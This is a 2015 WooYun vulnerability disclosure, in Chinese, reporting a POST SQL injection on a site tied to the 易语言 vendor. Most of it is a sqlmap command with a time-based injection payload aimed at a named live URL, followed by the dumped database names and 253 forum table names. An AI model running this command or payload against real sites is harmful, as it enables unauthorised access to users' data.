当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091572

漏洞标题:易语言某站一处sql注入可引起全部数据泄漏

相关厂商:易语言

漏洞作者: 百家乐

提交时间:2015-01-13 10:57

修复时间:2015-02-27 10:58

公开时间:2015-02-27 10:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-02-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

易语言是一门计算机编程语言。以“易”著称,以中文作为程序代码表达的语言形式。易语言的创始人是吴涛。早期版本的名字为E语言。易语言最早的版本的发布可追溯至2000年9月11日。可以说,创造易语言的初衷是进行用中文来编写程序的实践。从2000年至今,易语言已经发展到一定的规模:功能上、用户数量上都十分可观。

详细说明:

同服站http://www.wodeso.com/
网站提交出http://www.wodeso.com/Websubmit/websubmit.htm
POST注入。

漏洞证明:

sqlmap -u "http://www.wodeso.com/websubmit/sitesubmit.php" --data "email=sample%40email.tst&mno=1&pno=1&qqno=1&siteintro=http://www.wooyun.org&sitename=caablhns&uname=caablhns&url=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/"


available databases [14]:
[*] 5a5x_dh
[*] bbs_eyuyan
[*] hyt_yinc
[*] information_schema
[*] mysql
[*] s476658db0
[*] sqlnrcce
[*] test
[*] wode_esdn
[*] wodeso_web
[*] wodesoft
[*] yinic_web
[*] yinic_wht
[*] yinic_wodeso


嗯,去官方论坛看了下,大概60多万的用户了
Database: bbs_eyuyan
[253 tables]
+---------------------------+
| ebbs_actattachs |
| ebbs_actions |
| ebbs_active |
| ebbs_activity |
| ebbs_activitycate |
| ebbs_activitydefaultvalue |
| ebbs_activityfield |
| ebbs_activitymembers |
| ebbs_activitymodel |
| ebbs_activitypaylog |
| ebbs_activityvalue1 |
| ebbs_activityvalue10 |
| ebbs_activityvalue11 |
| ebbs_activityvalue12 |
| ebbs_activityvalue13 |
| ebbs_activityvalue14 |
| ebbs_activityvalue15 |
| ebbs_activityvalue16 |
| ebbs_activityvalue17 |
| ebbs_activityvalue18 |
| ebbs_activityvalue2 |
| ebbs_activityvalue3 |
| ebbs_activityvalue4 |
| ebbs_activityvalue5 |
| ebbs_activityvalue6 |
| ebbs_activityvalue7 |
| ebbs_activityvalue8 |
| ebbs_activityvalue9 |
| ebbs_actmember |
| ebbs_actmembers |
| ebbs_administrators |
| ebbs_adminlog |
| ebbs_adminset |
| ebbs_advert |
| ebbs_announce |
| ebbs_area_level |
| ebbs_areas |
| ebbs_argument |
| ebbs_attachbuy |
| ebbs_attachdownload |
| ebbs_attachs |
| ebbs_attention |
| ebbs_attention_blacklist |
| ebbs_auth_certificate |
| ebbs_ban |
| ebbs_banuser |
| ebbs_bbsinfo |
| ebbs_block |
| ebbs_buyadvert |
| ebbs_cache |
| ebbs_cache_distribute |
| ebbs_cache_members |
| ebbs_cachedata |
| ebbs_channel |
| ebbs_clientorder |
| ebbs_cmembers |
| ebbs_cms_article |
| ebbs_cms_articlecontent |
| ebbs_cms_articleextend |
| ebbs_cms_attach |
| ebbs_cms_column |
| ebbs_cms_purview |
| ebbs_cnalbum |
| ebbs_cnclass |
| ebbs_cnlevel |
| ebbs_cnphoto |
| ebbs_cnskin |
| ebbs_cnstyles |
| ebbs_collection |
| ebbs_collectiontype |
| ebbs_colonys |
| ebbs_comment |
| ebbs_company |
| ebbs_config |
| ebbs_creditlog |
| ebbs_creditlog1 |
| ebbs_credits |
| ebbs_customfield |
| ebbs_cwritedata |
| ebbs_datanalyse |
| ebbs_datastate |
| ebbs_datastore |
| ebbs_debatedata |
| ebbs_debates |
| ebbs_delta_diarys |
| ebbs_delta_members |
| ebbs_delta_posts |
| ebbs_delta_threads |
| ebbs_diary |
| ebbs_diarytype |
| ebbs_draft |
| ebbs_elements |
| ebbs_extragroups |
| ebbs_favors |
| ebbs_feed |
| ebbs_filter |
| ebbs_filter_class |
| ebbs_filter_dictionary |
| ebbs_focus |
| ebbs_forumdata |
| ebbs_forumlog |
| ebbs_forummsg |
| ebbs_forums |
| ebbs_forumsell |
| ebbs_forumsextra |
| ebbs_friends |
| ebbs_friendtype |
| ebbs_group_replay |
| ebbs_hack |
| ebbs_help |
| ebbs_hits_threads |
| ebbs_invitecode |
| ebbs_inviterecord |
| ebbs_invoke |
| ebbs_invokepiece |
| ebbs_ipstates |
| ebbs_job |
| ebbs_jober |
| ebbs_log_colonys |
| ebbs_log_diary |
| ebbs_log_forums |
| ebbs_log_members |
| ebbs_log_posts |
| ebbs_log_setting |
| ebbs_log_threads |
| ebbs_medalinfo |
| ebbs_medalslogs |
| ebbs_medaluser |
| ebbs_membercredit |
| ebbs_memberdata |
| ebbs_memberinfo |
| ebbs_members |
| ebbs_membertags |
| ebbs_membertags_relations |
| ebbs_memo |
| ebbs_modehot |
| ebbs_mpageconfig |
| ebbs_ms_attachs |
| ebbs_ms_configs |
| ebbs_ms_messages |
| ebbs_ms_relations |
| ebbs_ms_replies |
| ebbs_ms_searchs |
| ebbs_ms_tasks |
| ebbs_msg |
| ebbs_msgc |
| ebbs_msglog |
| ebbs_nav |
| ebbs_oboard |
| ebbs_online |
| ebbs_online_guest |
| ebbs_online_statistics |
| ebbs_online_user |
| ebbs_ouserdata |
| ebbs_overprint |
| ebbs_owritedata |
| ebbs_pagecache |
| ebbs_pageinvoke |
| ebbs_pcfield |
| ebbs_pcmember |
| ebbs_pcvalue1 |
| ebbs_permission |
| ebbs_pidtmp |
| ebbs_pinglog |
| ebbs_plan |
| ebbs_polls |
| ebbs_postcate |
| ebbs_posts |
| ebbs_posts1 |
| ebbs_postsfloor |
| ebbs_poststopped |
| ebbs_privacy |
| ebbs_proclock |
| ebbs_pushdata |
| ebbs_pushpic |
| ebbs_rate |
| ebbs_rateconfig |
| ebbs_rateresult |
| ebbs_recycle |
| ebbs_report |
| ebbs_reward |
| ebbs_schcache |
| ebbs_school |
| ebbs_searchadvert |
| ebbs_searchforum |
| ebbs_searchfourm |
| ebbs_searchhotwords |
| ebbs_searchstatistic |
| ebbs_setform |
| ebbs_sharelinks |
| ebbs_sharelinksrelation |
| ebbs_sharelinkstype |
| ebbs_singleright |
| ebbs_smiles |
| ebbs_space |
| ebbs_sqlcv |
| ebbs_stamp |
| ebbs_statistics_daily |
| ebbs_stopic |
| ebbs_stopicblock |
| ebbs_stopiccategory |
| ebbs_stopicpictures |
| ebbs_stopicunit |
| ebbs_styles |
| ebbs_tagdata |
| ebbs_tags |
| ebbs_task |
| ebbs_threads |
| ebbs_threads_img |
| ebbs_tmsgs |
| ebbs_tmsgs1 |
| ebbs_toollog |
| ebbs_tools |
| ebbs_topiccate |
| ebbs_topicfield |
| ebbs_topicmodel |
| ebbs_topictype |
| ebbs_topicvalue1 |
| ebbs_topicvalue2 |
| ebbs_topicvalue3 |
| ebbs_topicvalue4 |
| ebbs_topicvalue5 |
| ebbs_topicvalue6 |
| ebbs_topicvalue7 |
| ebbs_topicvalue8 |
| ebbs_tpl |
| ebbs_tpltype |
| ebbs_trade |
| ebbs_tradeorder |
| ebbs_ucapp |
| ebbs_ucnotify |
| ebbs_ucsyncredit |
| ebbs_user_career |
| ebbs_user_education |
| ebbs_userapp |
| ebbs_userbinding |
| ebbs_usercache |
| ebbs_usergroups |
| ebbs_usertool |
| ebbs_voter |
| ebbs_weibo_bind |
| ebbs_weibo_cmrelations |
| ebbs_weibo_cnrelations |
| ebbs_weibo_comment |
| ebbs_weibo_content |
| ebbs_weibo_referto |
| ebbs_weibo_relations |
| ebbs_weibo_topicattention |
| ebbs_weibo_topicrelations |
| ebbs_weibo_topics |
| ebbs_windcode |
| ebbs_wordfb |
| ebbs_write_smiles |
+---------------------------+

修复方案:

RT

版权声明:转载请注明来源 百家乐@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2015-01-13 11:03 | 百家乐 ( 路人 | Rank:6 漏洞数:5 | 时时彩-百家乐-澳门XXXXXXX)

    要忽略的节奏

  2. 2015-02-27 11:55 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    你的乌鸦嘴……话说你的语句杂么构造的?没看明白啊

  3. 2015-03-29 11:13 | 百家乐 ( 路人 | Rank:6 漏洞数:5 | 时时彩-百家乐-澳门XXXXXXX)

    @明月影 ...